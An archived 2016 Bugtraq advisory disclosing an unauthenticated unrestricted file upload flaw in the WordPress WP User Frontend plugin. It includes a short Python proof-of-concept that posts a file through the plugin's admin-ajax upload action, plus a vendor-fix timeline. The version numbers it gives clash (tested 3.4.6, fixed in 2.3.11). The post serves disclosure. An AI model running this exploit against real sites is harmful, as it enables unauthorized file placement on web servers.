lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <56B89CDD.10302@gmail.com>
Date: Mon, 8 Feb 2016 15:49:17 +0200
From: Panagiotis Vagenas <pan.vagenas@...il.com>
To: bugtraq@...urityfocus.com
Subject: WordPress WP User Frontend Plugin [Unrestricted File Upload]

* Exploit Title: WordPress WP User Frontend Plugin [Unrestricted File
Upload]
* Discovery Date: 2016-02-04
* Public Disclosure: 2016-02-08
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: https://wedevs.com
* Software Link: https://wordpress.org/plugins/wp-user-frontend
* Version: 3.4.6
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress


Description
-----------

WordPress plugin _WP User Frontend_ suffers from an unrestricted file
uploade vulnerability. An attacker can exploit the `wpuf_file_upload` or
`wpuf_insert_image` actions to upload any file which pass the WordPress
mime and size checks.

The attack does not require any privilege to be performed. The mentioned
actions are available to non-privileged users also, thus allowing to
anyone uploading files to the web server.

PoC
---

 
```
#!/usr/bin/python3

################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <pan.vagenas@...il.com>
################################################################################

import requests
import tempfile

url = 'http://example.com/wp-admin/admin-ajax.php'

postData = {
    'action': 'wpuf_file_upload'
}

file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')

file.write('A'*32)

file.seek(0)

files = {'wpuf_file': file}

r = requests.post(url, data=postData, files=files)

file.close()

if r.text != 'error':
    print('Success!')
    print(r.text)
else:
    print('error')

exit(0)

```

Timeline
--------

1. **2016-02-04**: Vendor notified via support forums in WordPress.org
2. **2016-02-05**: Vendor responded
3. **2016-02-05**: Issue details send to vendor
4. **2016-02-06**: Requested CVE ID
5. **2016-02-06**: Vendor implemented security checks
6. **2016-02-06**: Verified that this exploit is no longer valid
7. **2016-02-08**: Vendor released v2.3.11 which resolves this issue

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ